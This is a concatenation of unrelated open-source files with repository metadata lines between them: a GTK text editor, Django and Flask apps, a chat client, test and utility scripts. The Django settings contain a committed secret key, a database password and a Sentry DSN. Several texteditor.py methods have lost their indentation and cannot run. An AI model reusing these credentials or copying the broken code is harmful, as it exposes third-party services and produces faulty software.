        self.height = self.pixel_height / float(TheWorld.height)  #+ self.padding
    def draw(self, context, x, y):
        """Render the bubble background, the text and the cursor.

        NOTE(review): the x/y parameters are currently unused; drawing
        happens at the context origin -- confirm callers pre-translate.
        """
        # figure out scale factor
        # TODO - Text should be independant of scale factor
        scale_x = 1.0 / self.pixel_width
        scale_y = 1.0 / self.pixel_height
        # render the text
        context.save()
        #context.set_source_rgba(0.0, 0.0, 0.0, 1.0)
        context.move_to(0.0, 0.0)
        context.scale(scale_x, scale_y)
        # draw a background for the text
        self.draw_background(context, 0.0, 0.0, self.pixel_width, self.pixel_height, 10)  # ve vant square rounded corners :-)
        context.set_source_rgba(0.0, 0.0, 0.0, 1.0)
        context.show_layout(self.layout)
        context.restore()
        # render cursor
        self.draw_cursor(context)
    def draw_cursor(self, context):
        """Draw a vertical caret at the current cursor index."""
        (strong, weak) = self.layout.get_cursor_pos(self.cursorindex)
        (startx, starty, curx, cury) = strong
        # Convert from pango units to world-normalised coordinates.
        startx /= pango.SCALE * float(TheWorld.width)
        starty /= pango.SCALE * float(TheWorld.height)
        curx /= pango.SCALE * float(TheWorld.width)
        cury /= pango.SCALE * float(TheWorld.height)
        context.set_line_width(0.02)
        context.set_source_rgba(0.0, 0.0, 0.0, 1.0)
        # Small 0.001 offset keeps the caret visible at column 0.
        context.move_to(0.001 + (startx / self.width), starty / self.height)
        context.line_to(0.001 + (startx / self.width), (starty + cury) / self.height)
        context.stroke()
    def draw_background(self, context, x, y, w, h, r):
        """Draw the rounded, padded bubble plus three trailing 'thought'
        circles below it; *r* is the corner radius."""
        # Grow the box by the padding on all sides.
        x -= self.padding
        y -= self.padding
        w += self.padding * 2.0
        h += self.padding * 2.0
        # rounded box
        context.move_to(x + r, y)  # top left
        context.line_to(x + w - r, y)  # top right
        context.arc(x + w - r, y + r, r, math.pi + math.pi / 2.0, 0.0)
        context.line_to(x + w, y + h - r)  # bottom right
        context.arc(x + w - r, y + h - r, r, 0, math.pi / 2.0)
        context.line_to(x + r, y + h)  # bottom left
        context.arc(x + r, y + h - r, r, math.pi / 2.0, math.pi)
        context.line_to(x, y + r)  # top left
        context.arc(x + r, y + r, r, math.pi, math.pi + math.pi / 2.0)
        context.set_source_rgba(0.8, 0.8, 1.0, 0.5)
        context.fill_preserve()
        context.set_line_width(4.0)
        context.set_source_rgba(0.2, 0.2, 1.0, 0.9)
        context.stroke()
        # thought bubble: three shrinking circles trailing off the box.
        context.arc(x + w / 1.5, y + h * 1.1, self.pixel_height / 10.0, 0.0, math.pi * 2.0)
        context.set_source_rgba(0.8, 0.8, 1.0, 0.5)
        context.fill_preserve()
        context.set_source_rgba(0.2, 0.2, 1.0, 0.9)
        context.stroke()
        context.arc(x + w / 1.7, y + h * 1.2, self.pixel_height / 20.0, 0.0, math.pi * 2.0)
        context.set_source_rgba(0.8, 0.8, 1.0, 0.5)
        context.fill_preserve()
        context.set_source_rgba(0.2, 0.2, 1.0, 0.9)
        context.stroke()
        context.arc(x + w / 1.9, y + h * 1.3, self.pixel_height / 30.0, 0.0, math.pi * 2.0)
        context.set_source_rgba(0.8, 0.8, 1.0, 0.5)
        context.fill_preserve()
        context.set_source_rgba(0.2, 0.2, 1.0, 0.9)
        context.stroke()
# -- key handling ---------------------------------------------------------
def do_key_press_event(self, event):
try :
{ gtk.keysyms.BackSpace : self.do_key_press_backspace,
gtk.keysyms.Delete : self.do_key_press_delete,
gtk.keysyms.Home : self.do_key_press_home,
gtk.keysyms.End : self.do_key_press_end,
gtk.keysyms.Left : self.do_key_press_left,
gtk.keysyms.Right : self.do_key_press_right,
gtk.keysyms.Up : self.do_key_press_up,
gtk.keysyms.Down : self.do_key_press_down } [event.keyval]()
except:
pass
if event.string:
left = self.text[ : self.cursorindex]
right = self.text[self.cursorindex : ]
if event.string == "\r":
self.text = left + "\n" + right
else:
self.text = left + event.string + right
self.cursorindex += 1
def do_key_press_backspace(self):
left = self.text[ : self.cursorindex - 1]
right = self.text[self.cursorindex : ]
self.text = left + right
if self.cursorindex > 0:
self.cursorindex -= 1
def do_key_press_delete(self):
left = self.text[ : self.cursorindex]
right = self.text[self.cursorindex + 1 : ]
self.text = left + right
    def do_key_press_home(self):
        """Move the cursor to the start of the current line."""
        lines = self.text.splitlines ()
        loc = 0
        line = 0
        for i in lines:
            loc += len(i) + 1  # +1 accounts for the newline
            if loc > self.cursorindex:
                # Cursor is on this line; jump to its first column.
                self.cursorindex = loc - len(i) - 1
                return
            line += 1
    def do_key_press_end(self):
        """Move the cursor to the end of the current line."""
        lines = self.text.splitlines()
        loc = 0
        line = 0
        for i in lines:
            loc += len(i) + 1  # +1 accounts for the newline
            if loc > self.cursorindex:
                # Place the cursor just before this line's newline.
                self.cursorindex = loc - 1
                return
            line += 1
def do_key_press_left(self):
if self.cursorindex > 0:
self.cursorindex -= 1
def do_key_press_right(self):
if self.cursorindex < len(self.text):
self.cursorindex += 1
    def do_key_press_up(self):
        """Move the cursor one line up, keeping the column when possible."""
        lines = self.text.splitlines()
        if len(lines) == 1:
            # Single line: nowhere to go.
            return
        loc = 0
        line = 0
        # Locate the line containing the cursor.
        for i in lines:
            loc += len(i) + 1  # +1 accounts for the newline
            if loc > self.cursorindex:
                loc -= len(i) + 1  # rewind to this line's start
                line -= 1          # target the previous line
                break
            line += 1
        if line == -1:
            # Already on the first line.
            return
        elif line >= len(lines):
            # Cursor past the last line (e.g. trailing newline): step back
            # over the final line.
            self.cursorindex -= len(lines[-1]) + 1
            return
        # Column offset within the current line.
        dist = self.cursorindex - loc -1
        self.cursorindex = loc
        if dist < len(lines[line]):
            # Previous line is long enough: keep the column.
            self.cursorindex -= (len(lines[line]) - dist)
        else:
            # Previous line is shorter: land on its end.
            self.cursorindex -= 1
    def do_key_press_down(self):
        """Move the cursor one line down, keeping the column when possible."""
        lines = self.text.splitlines()
        if len(lines) == 1:
            # Single line: nowhere to go.
            return
        loc = 0
        line = 0
        # Locate the line containing the cursor.
        for i in lines:
            loc += len(i) + 1  # +1 accounts for the newline
            if loc > self.cursorindex:
                break
            line += 1
        if line >= len(lines) - 1:
            # Already on the last line.
            return
        # Column offset within the current line.
        dist = self.cursorindex - (loc - len(lines[line])) + 1
        self.cursorindex = loc
        if dist > len (lines[line + 1]):
            # Next line is shorter: land on its end.
            self.cursorindex += len(lines[line + 1])
        else:
            # Next line is long enough: keep the column.
            self.cursorindex += dist
| antoinevg/survival | widgets/texteditor.py | Python | gpl-2.0 | 7,247 |
"""
Django settings for SimpleChat project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))

# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to version control -- rotate it and
# load it from the environment before any real deployment.
SECRET_KEY = '3o-kw!!=*b7o3mz6nmbllne##wiu7m_lzk%9j&p@@(ecsue&f7'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True

ALLOWED_HOSTS = []

# Application definition
INSTALLED_APPS = (
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'chat',
)

MIDDLEWARE_CLASSES = (
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
)

ROOT_URLCONF = 'SimpleChat.urls'
WSGI_APPLICATION = 'SimpleChat.wsgi.application'

# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}

# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'

# Base URL clients use to reach this host.
BASE_URL = "http://192.168.0.60:9000"

# Optional machine-local overrides; absence is not an error.
try:
    from local_settings import *
except ImportError:
    pass
from .base import *

# Production overrides for the base settings.
DEBUG = False
ALLOWED_HOSTS = ['*']

DATABASES = {
    'default': {
        'ENGINE': 'django.contrib.gis.db.backends.postgis',#'django.db.backends.postgresql_psycopg2',
        'NAME': 'bauth',
        'USER': 'postgres',
        'ADMINUSER':'postgres',
        # NOTE(review): database password committed to version control --
        # rotate it and load it from the environment/secret store.
        'PASSWORD': 'C7TS*+dp~-9JHwb*7rzP',
        'HOST': '127.0.0.1',
        'PORT': '',
    }
}

# Add raven to the list of installed apps
INSTALLED_APPS = INSTALLED_APPS + (
    # ...
    'raven.contrib.django.raven_compat',
)

RAVEN_CONFIG = {
    # NOTE(review): Sentry DSN committed to version control -- treat it as
    # a secret and rotate.
    'dsn': 'https://5fa65a7464454dcbadff8a7587d1eaa0:205b12d200e24b39b4c586f7df3965ba@app.getsentry.com/29978',
}
#
# Moisture control - Serial communication widgets
#
# Copyright (c) 2013 Michael Buesch <m@bues.ch>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
from pymoistcontrol.util import *
import os
class SerialOpenDialog(QDialog):
    """Serial port connection dialog.

    Presents a combo box of candidate serial ports (platform dependent)
    plus Ok/Cancel buttons; use getSelectedPort() after accept().
    """

    def __init__(self, parent):
        """Class constructor."""
        QDialog.__init__(self, parent)
        self.setLayout(QGridLayout(self))
        self.setWindowTitle("Select serial port")
        self.portCombo = QComboBox(self)
        if os.name.lower() == "posix":
            # Unix operating system
            # Add all serial devices from /dev to
            # the combo box.
            devNodes = QDir("/dev").entryInfoList(QDir.System,
                                                  QDir.Name)
            select = None
            for node in devNodes:
                name = node.fileName()
                # Only classic UARTs (ttyS*) and USB adapters (ttyUSB*).
                if not name.startswith("ttyS") and\
                   not name.startswith("ttyUSB"):
                    continue
                path = node.filePath()
                self.portCombo.addItem(path, path)
                if select is None and\
                   name.startswith("ttyUSB"):
                    # Select the first ttyUSB by default.
                    select = self.portCombo.count() - 1
            if select is not None:
                self.portCombo.setCurrentIndex(select)
        elif os.name.lower() in ("nt", "ce"):
            # Windows operating system
            # Add 8 COM ports to the combo box.
            for i in range(8):
                port = "COM%d" % (i + 1)
                self.portCombo.addItem(port, port)
        else:
            raise Error("Operating system not supported")
        self.layout().addWidget(self.portCombo, 0, 0, 1, 2)
        self.okButton = QPushButton("&Ok", self)
        self.layout().addWidget(self.okButton, 1, 0)
        self.cancelButton = QPushButton("&Cancel", self)
        self.layout().addWidget(self.cancelButton, 1, 1)
        self.okButton.released.connect(self.accept)
        self.cancelButton.released.connect(self.reject)

    def getSelectedPort(self):
        """Get the selected port name, or None when nothing is selected."""
        index = self.portCombo.currentIndex()
        if index < 0:
            return None
        return self.portCombo.itemData(index)
| mbuesch/moistcontrol | host/pymoistcontrol/commwidgets.py | Python | gpl-2.0 | 2,555 |
# Define here the models for your scraped items
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/items.html
from scrapy.item import Item, Field
class PopularArticlesItem(Item):
    """Scrapy item for popular-article records; no fields defined yet."""
    # define the fields for your item here like:
    # name = Field()
    pass
| Davidhw/WikipediaEditScrapingAndAnalysis | scraping_wikipedia_links/popular_articles/popular_articles/items.py | Python | gpl-2.0 | 276 |
#coding:utf-8
from django.shortcuts import render,render_to_response,redirect
from django.core.urlresolvers import reverse
from block.models import Blocks
from models import Article
from django.template import RequestContext
from django.contrib import messages
from django.contrib.auth.decorators import login_required
# Create your views here.
def article_list(request,block_id):
    """Render every article in a block, most recently updated first."""
    block = Blocks.objects.get(id=int(block_id))
    articles = Article.objects.filter(block=block).order_by(
        "-last_update_timestamp")
    context = {"articles": articles, "b": block}
    return render_to_response("articles_list.html", context,
                              context_instance=RequestContext(request))
@login_required()
def article_create(request,block_id):
    """Show the new-article form on GET; validate and save it on POST."""
    block_id=int(block_id)
    block=Blocks.objects.get(id=block_id)
    if request.method=="GET":
        return render_to_response("article_create.html",{"b":block},context_instance=RequestContext(request))
    else:
        title=request.POST['title'].strip()
        content=request.POST['content'].strip()
        if not title or not content:
            # Re-display the form with an error, keeping what was typed.
            messages.add_message(request,messages.ERROR,u'标题和内容不能为空!')
            return render_to_response("article_create.html",{"b":block,"title":title,"content":content},context_instance=RequestContext(request))
        new_article=Article(block=block,title=title,content=content,owner=request.user)
        new_article.save()
        messages.add_message(request,messages.INFO,u'成功发表文章!')
        # Back to the block's article list after a successful post.
        return redirect(reverse("article_list",args=[block.id,]))
def article_detail(request, article_id):
    """Render a single article looked up by primary key.

    Fix: the request parameter was misspelled 'requset'; Django passes
    it positionally, so renaming it is safe for callers.
    """
    article = Article.objects.get(id=int(article_id))
    return render_to_response("article_detail.html", {"article": article},
                              context_instance=RequestContext(request))
from rest_framework import serializers
class MailTestSerializer(serializers.Serializer):
    """Validates the SMTP settings submitted for a mail connection test."""
    EMAIL_HOST = serializers.CharField(max_length=1024, required=True)
    EMAIL_PORT = serializers.IntegerField(default=25)
    EMAIL_HOST_USER = serializers.CharField(max_length=1024)
    EMAIL_HOST_PASSWORD = serializers.CharField(required=False, allow_blank=True)
    EMAIL_FROM = serializers.CharField(required=False, allow_blank=True)
    EMAIL_USE_SSL = serializers.BooleanField(default=False)
    EMAIL_USE_TLS = serializers.BooleanField(default=False)
class LDAPTestSerializer(serializers.Serializer):
    """Validates the LDAP settings submitted for a connection test."""
    AUTH_LDAP_SERVER_URI = serializers.CharField(max_length=1024)
    AUTH_LDAP_BIND_DN = serializers.CharField(max_length=1024, required=False, allow_blank=True)
    AUTH_LDAP_BIND_PASSWORD = serializers.CharField(required=False, allow_blank=True)
    AUTH_LDAP_SEARCH_OU = serializers.CharField()
    AUTH_LDAP_SEARCH_FILTER = serializers.CharField()
    AUTH_LDAP_USER_ATTR_MAP = serializers.CharField()
    AUTH_LDAP_START_TLS = serializers.BooleanField(required=False)
class LDAPUserSerializer(serializers.Serializer):
    """Read-side representation of an LDAP user entry."""
    id = serializers.CharField()
    username = serializers.CharField()
    email = serializers.CharField()
    # NOTE(review): presumably True when a matching local user already
    # exists -- confirm against the view that populates it.
    existing = serializers.BooleanField(read_only=True)
| eli261/jumpserver | apps/settings/serializers.py | Python | gpl-2.0 | 1,295 |
#!/usr/bin/python2
import os,sys,socket,select
from time import strftime
# Keys recognised in the user's settings file ('name ...' / 'tripcode ...').
variables = ['name','tripcode']
# Commands forwarded to the server instead of being handled locally.
servercommands = ["/pm", "/peoplecount"]
def date():
    """Return today's date as '.YYYY-MM-DD', used to suffix log files."""
    return "." + strftime("%Y-%m-%d")
def chat_client(inputsocket,data,location):
    """Run the interactive chat loop on an already-connected socket.

    inputsocket -- connected socket to the chat server.
    data -- (name, tripcode) defaults, possibly overridden by settings.
    location -- base directory holding resources/programparts/radchat.
    Python 2 only (print statements, select on sys.stdin).
    """
    #initialize radchat client files
    if not os.path.exists(location+'/resources/programparts/radchat'): os.makedirs(location+'/resources/programparts/radchat')
    if not os.path.exists(location+'/resources/programparts/radchat/logs'): os.makedirs(location+'/resources/programparts/radchat/logs')
    if not os.path.exists(location+'/resources/programparts/radchat/settings.txt'):
        with open(location+'/resources/programparts/radchat/settings.txt', "a") as settingsfile:
            settingsfile.write("")
    #introduce variables
    name = data[0]
    tripcode = data[1]
    #if there is a settings file, read it
    # NOTE(review): line.split()[0] raises IndexError on blank lines in
    # the settings file -- confirm whether blank lines can occur.
    if os.path.isfile(location + '/resources/programparts/radchat/settings.txt'):
        with open(location + '/resources/programparts/radchat/settings.txt') as settingsfile:
            for line in settingsfile:
                if line.split()[0] == "name":
                    name = line[5:].replace("\n","")
                if line.split()[0] == "tripcode":
                    tripcode = line[9:].replace("\n", "")
                if line.split()[0] == "host":
                    host = line[5:].replace("\n","")
                if line.split()[0] == "port":
                    port = int(line[5:].replace("\n",""))
    s = inputsocket
    sys.stdout.write("\n[{}] ".format(name)); sys.stdout.flush()
    while 1:
        socket_list = [sys.stdin, s]
        # Get the list sockets which are readable
        ready_to_read,ready_to_write,in_error = select.select(socket_list , [], [])
        for sock in ready_to_read:
            if sock == s:
                # incoming message from remote server, s
                data = sock.recv(4096)
                if not data :
                    # Empty read means the server closed the connection.
                    print '\nDisconnected from chat server'
                    return
                else :
                    # Append to today's log, then redraw the whole log.
                    with open(location+'/resources/programparts/radchat/logs/client'+date(), "a") as log:
                        log.write(data + "\n")
                    os.system('cls' if os.name == 'nt' else 'tput reset')  # cross platform screen clearing. this just in, clears the ENTIRE SHELL
                    with open(location+'/resources/programparts/radchat/logs/client'+date(), "r") as log:
                        sys.stdout.write(log.read())  # prints the entire log. alll of it.
                    sys.stdout.write('\n\n[{}] '.format(name))  # skips to new first line, rewrites name.
                    sys.stdout.flush()
            else :
                # user entered a message
                message = sys.stdin.readline().replace("\n", "")
                if message:
                    if message[0] == "/" and message.split()[0] not in servercommands:
                        # that message was a local client command
                        if message.split()[0] == "/changename":
                            name = message[len(message.split()[0])+1:].replace("\n","")
                            if not name:
                                name = "Anonymous"
                        elif message.split()[0] == "/changetripcode":
                            tripcode = message[len(message.split()[0])+1:].replace("\n","")
                        elif message.split()[0] == "/exit" or message.split()[0] == "/quit" or message.split()[0] == "/leave":
                            print "Leaving chat server."
                            return
                        elif message.split()[0] == "/help" or message.split()[0] == "/?":
                            sys.stdout.write("\nThanks for using the radchat client. Here are the commands you currently have available:\n/changename + new name: changes your name\n/changetripcode + new tripcode: changes your trip code.\n/quit OR /leave: exits gracefully\n/help OR /?: Displays this menu.\n")
                        else:
                            print "Invalid command"
                    else:
                        # format all the data and send it
                        s.send("{}\n{}\n{}".format(message, name, tripcode))
                        sys.stdout.write('[{}] '.format(name))
                        sys.stdout.flush()
from flask import Blueprint, request, render_template, jsonify
from housesGenerator import House
from holdings import Holdings
houses = Blueprint('houses', __name__, url_prefix='/houses')
@houses.route('/')
def index():
    """Render the landing page of the houses blueprint."""
    return render_template('houses.html')
@houses.route('/houseGenerator', methods=['GET', 'POST'])
def houseGenerator():
    """
    Generate a house from query-string parameters and return it as JSON.

    Query parameters read: ``realm``, ``size``, ``foundation``, ``name``.

    NOTE(review): the route accepts POST, but only ``request.args`` (the
    query string) is read — a POSTed form body would be ignored. Confirm
    that callers always pass parameters in the query string.
    """
    realm = request.args.get('realm')
    size = request.args.get('size')
    foundation = request.args.get('foundation')
    name = request.args.get('name')
    # Build the base house, then populate all of its holdings.
    house = House.startingResources(realm, size, foundation, name)
    from holdings import holdingsData
    generatedHouse = Holdings(holdingsData).generateAllHoldings(house, realm)
    return jsonify(generatedHouse)
| ondoheer/GOT-Platform | app/houses/views.py | Python | gpl-2.0 | 723 |
#!/usr/bin/env python3
import unittest, sys, findbits
class TestFindBits(unittest.TestCase):
    """Exercise the helper functions of the findbits module.

    stdout is swapped for an in-memory buffer around every test so the
    console output of findbits.search can be inspected with assertIn.
    """

    def setUp(self):
        # Redirect stdout into an in-memory buffer for the test's duration.
        self.old_stdout = sys.stdout
        sys.stdout = OutputBuffer()

    def tearDown(self):
        # Put the real stdout back.
        sys.stdout = self.old_stdout

    INVERT_CASES = [
        ('10', '01'),
        ('', ''),
    ]

    def test_invert(self):
        self.commutative_test(findbits.invert, self.INVERT_CASES)

    SEARCH_CASES = [
        ('1111', '10111101', ['Match at bit 2', '0<1111>0']),
        ('00', '10111101', ['Not found']),
    ]

    def test_search(self):
        for needle, haystack, fragments in self.SEARCH_CASES:
            sys.stdout.clear_buffer()
            findbits.search(needle, haystack)
            for piece in fragments:
                self.assertIn(piece, sys.stdout.content)

    BINSTRING_CASES = [
        (42, '101010'),
        (1, '1'),
        (0, ''),
    ]

    def test_binstring(self):
        self.unary_operation_test(findbits.binstring, self.BINSTRING_CASES)

    REVERSE_CASES = [
        ('abc', 'cba'),
        ('', ''),
    ]

    def test_stringreverse(self):
        self.commutative_test(findbits.stringreverse, self.REVERSE_CASES)

    def commutative_test(self, operation, cases):
        # The mapping must hold both ways: f(in) == out and f(out) == in.
        self.unary_operation_test(operation, cases)
        self.unary_operation_test(operation,
                                  [pair[::-1] for pair in cases])

    def unary_operation_test(self, operation, cases):
        for given, expected in cases:
            self.assertEqual(operation(given), expected)
class OutputBuffer(object):
    """Minimal file-like sink that accumulates everything written to it.

    Exposes ``content`` (the accumulated text) and ``clear_buffer()`` so
    tests can reset it between calls.
    """

    def __init__(self):
        self.clear_buffer()

    def clear_buffer(self):
        # Discard anything captured so far.
        self.content = ''

    def write(self, data):
        # file-like protocol: append the written chunk.
        self.content = self.content + data
if __name__ == '__main__':
    # Run the test suite when this file is executed directly.
    unittest.main()
| samyk/proxmark3 | tools/findbits_test.py | Python | gpl-2.0 | 1,837 |
# -*- mode: python; coding: utf-8; -*-
import os
APP_NAME = "SLog"
VERSION = "0.9.4"
WEBSITE = "http://vialinx.org"

# GPL v2 notice displayed by the application.
# Fix: the original text was missing the standard "You should have
# received a copy of the GNU General Public License" sentence, so the
# notice jumped from "for more details." straight to "along with SLog;".
LICENSE = """
SLog is a PyGTK-based GUI for the LightLang SL dictionary.
Copyright 2007 Nasyrov Renat <renatn@gmail.com>

This file is part of SLog.

SLog is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.

SLog is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with SLog; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""

# "@prefix@" is substituted by the build system at install time.
INSTALL_PREFIX = "@prefix@"
PIXMAP_DIR = os.path.join(INSTALL_PREFIX, "share", "pixmaps")
LOCALE_DIR = os.path.join(INSTALL_PREFIX, "share", "locale")
DATA_DIR = os.path.join(INSTALL_PREFIX, "share", "slog")

LOGO_ICON = "slog.png"
LOGO_ICON_SPY = "slog_spy.png"

# Download locations for the LightLang dictionaries.
#FTP_LL_URL = "ftp://ftp.lightlang.org.ru/dicts"
FTP_LL_URL = "ftp://etc.edu.ru/pub/soft/for_linux/lightlang"
FTP_DICTS_URL = FTP_LL_URL + "/dicts"
FTP_REPO_URL = FTP_DICTS_URL + "/repodata/primary.xml"

# Local cache of the repository index, and scratch directory for SL.
REPO_FILE = os.path.expanduser("~/.config/slog/primary.xml")
SL_TMP_DIR = "/tmp/sl"
def get_icon(filename):
    """Return the absolute path of *filename* inside the pixmap directory."""
    return os.path.join(PIXMAP_DIR, filename)
| mdevaev/slog | src/common.py | Python | gpl-2.0 | 1,483 |
#!/usr/bin/env python3
#
import sys
import csv
from pprint import pprint
"""2018.10.28 John Dey
consume CSV output from pwalk and reassemble directory data.
File system data from pwalk is flattened and out of order.
Rewalk the tree data and create two new fields for each directory.
Create a tree sum of file count and bytes at each directory (node)
that represents the child nodes. Sums for the root will
become the total file count and sum size for every file.
Notes: I wrote this in Python as a proof of concept.
"""
def usage():
    """Print a usage message to stdout and exit with status 1."""
    # Fix: the original format string was "usage: % inputfile.csv", where
    # "% i" is parsed as a space flag plus an integer conversion; applying
    # it to the str sys.argv[0] raised TypeError instead of printing usage.
    print("usage: %s inputfile.csv" % sys.argv[0])
    sys.exit(1)
# Require exactly one argument: the pwalk CSV file to process.
if len(sys.argv ) != 2:
    usage()
# dd maps directory inode -> record with its parent inode, depth, and
# running file-count / byte-size totals.
dd = {}
with open(sys.argv[1], newline='') as csvfile:
    pwalk = csv.reader(csvfile, delimiter=',', quotechar='"')
    for row in pwalk:
        # pwalk emits -1 in the file-count column for non-directories.
        if int(row[15]) >= 0: # only store directories
            dd[int(row[0])] = {'parent': int(row[1]),
                               'depth': int(row[2]),
                               'dircnt': int(row[15]),
                               'sumcnt': int(row[15]), # or Zero?
                               'dirsiz': int(row[16]),
                               'sumsiz': int(row[16])}
            # pwalk marks the tree root with a parent inode of 0.
            if int(row[1]) == 0:
                root = int(row[0])
            # Count the directory entry itself and add its own size
            # (row[7], presumably st_size — TODO confirm pwalk column).
            dd[int(row[0])]['sumcnt'] += 1
            dd[int(row[0])]['sumsiz'] += int(row[7])
print("Total directories: %d" % len(dd.keys()))
"""reassemble the tree"""
# Propagate each directory's immediate count/size up through all of its
# ancestors so the root ends up with the grand totals.
# NOTE(review): only 'dircnt'/'dirsiz' are propagated; the +1 entry count
# and row[7] size added above never reach the ancestors — confirm that
# this matches the intended definition of the tree sums.
for inode in dd.keys():
    parent = dd[inode]['parent']
    while parent != 0:
        dd[parent]['sumcnt'] += dd[inode]['dircnt']
        dd[parent]['sumsiz'] += dd[inode]['dirsiz']
        parent = dd[parent]['parent']
pprint(dd[root])
| fizwit/filesystem-reporting-tools | reassemble.py | Python | gpl-2.0 | 1,682 |
from http.server import SimpleHTTPRequestHandler, HTTPServer
from socketserver import ThreadingMixIn
import threading
# HTTPServer that dispatches each incoming request on its own thread
# (behavior supplied by socketserver.ThreadingMixIn).
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
    """Handle requests in a separate thread."""
if __name__ == '__main__':
    # Serve the current working directory on localhost:8000 until killed.
    server = ThreadedHTTPServer(('localhost', 8000), SimpleHTTPRequestHandler)
    print( 'Starting server, use <Ctrl-C> to stop')
    server.serve_forever()
| jesah/leaflet_webgl | webserver.py | Python | gpl-2.0 | 407 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# Copyright (C) 2005-2008 Francisco José Rodríguez Bogado, #
# Diego Muñoz Escalante. #
# (pacoqueen@users.sourceforge.net, escalant3@users.sourceforge.net) #
# #
# This file is part of GeotexInn. #
# #
# GeotexInn is free software; you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation; either version 2 of the License, or #
# (at your option) any later version. #
# #
# GeotexInn is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with GeotexInn; if not, write to the Free Software #
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA #
###############################################################################
###################################################################
## confirmings.py - Gestión de confirmings recibidos.
###################################################################
## NOTAS:
##
## ----------------------------------------------------------------
## TODO:
## Los confirmings (según pclases) se marcan automáticamente como
## cobrados al pasar la fecha de vencimiento, pero para ello hay
## que llamar a esta_pendiente. Habría que hacer un proceso
## automático en el lado del servidor que actualizara los
## confirmings sin intervención del usuario.
###################################################################
## Changelog:
## 21 de noviembre de 2008 -> Inicio
##
###################################################################
from ventana import Ventana
from formularios import utils
import pygtk
pygtk.require('2.0')
import gtk
from framework import pclases
from utils import _float as float
import mx.DateTime
class Confirmings(Ventana):
def __init__(self, objeto = None, usuario = None):
"""
Constructor. objeto puede ser un objeto de pclases con el que
comenzar la ventana (en lugar del primero de la tabla, que es
el que se muestra por defecto).
"""
self.usuario = usuario
Ventana.__init__(self, 'confirmings.glade', objeto, usuario)
connections = {'b_salir/clicked': self.salir,
'b_nuevo/clicked': self.crear_nuevo,
'b_actualizar/clicked': self.actualizar_ventana,
'b_guardar/clicked': self.guardar,
'b_borrar/clicked': self.borrar,
'b_buscar/clicked': self.buscar,
'b_add_cobro/clicked': self.add_cobro,
'b_drop_cobro/clicked': self.drop_cobro,
'b_fechar/clicked': self.cambiar_fechar,
'b_fechac/clicked': self.cambiar_fechac,
'tb_pendiente/clicked': self.pendiente,
'b_add_abono/clicked': self.add_abono,
'b_recalcular/clicked': self.recalcular,
'b_split/clicked': self.dividir_confirming,
}
self.add_connections(connections)
self.inicializar_ventana()
if self.objeto == None:
self.ir_a_primero()
else:
self.ir_a(objeto)
gtk.main()
# --------------- Funciones auxiliares ------------------------------
def dividir_confirming(self, boton):
"""
Divide el confirming actual creando uno idéntico pero haciendo
corresponder a cada uno de ellos la mitad del importe total.
Para que coincidan esos importes totales con el contenido del
confirming, duplica también los vencimientos asociados dividiendo
el importe en 2.
"""
if utils.dialogo(titulo = "¿DIVIDIR CONFIRMING?",
texto = "Se procederá a dividir el confirming actual"
" en dos.\nAmbos serán idénticos y tendrán c"
"omo importe total la mitad del importe actu"
"al.\n\n¿Está seguro de dividir el confirmin"
"g?",
padre = self.wids['ventana']):
original = self.objeto
copia = pclases.Confirming(
codigo = original.codigo + " (DUPLICADO)",
fechaRecepcion = original.fechaRecepcion,
fechaCobro = original.fechaCobro,
cantidad = original.cantidad / 2.0,
cobrado = original.cobrado,
observaciones = '\n'.join((original.observaciones,
'Duplicado. Cambie el número de confirming.')),
fechaCobrado = original.fechaCobrado,
procesado = original.procesado,
banco = original.banco)
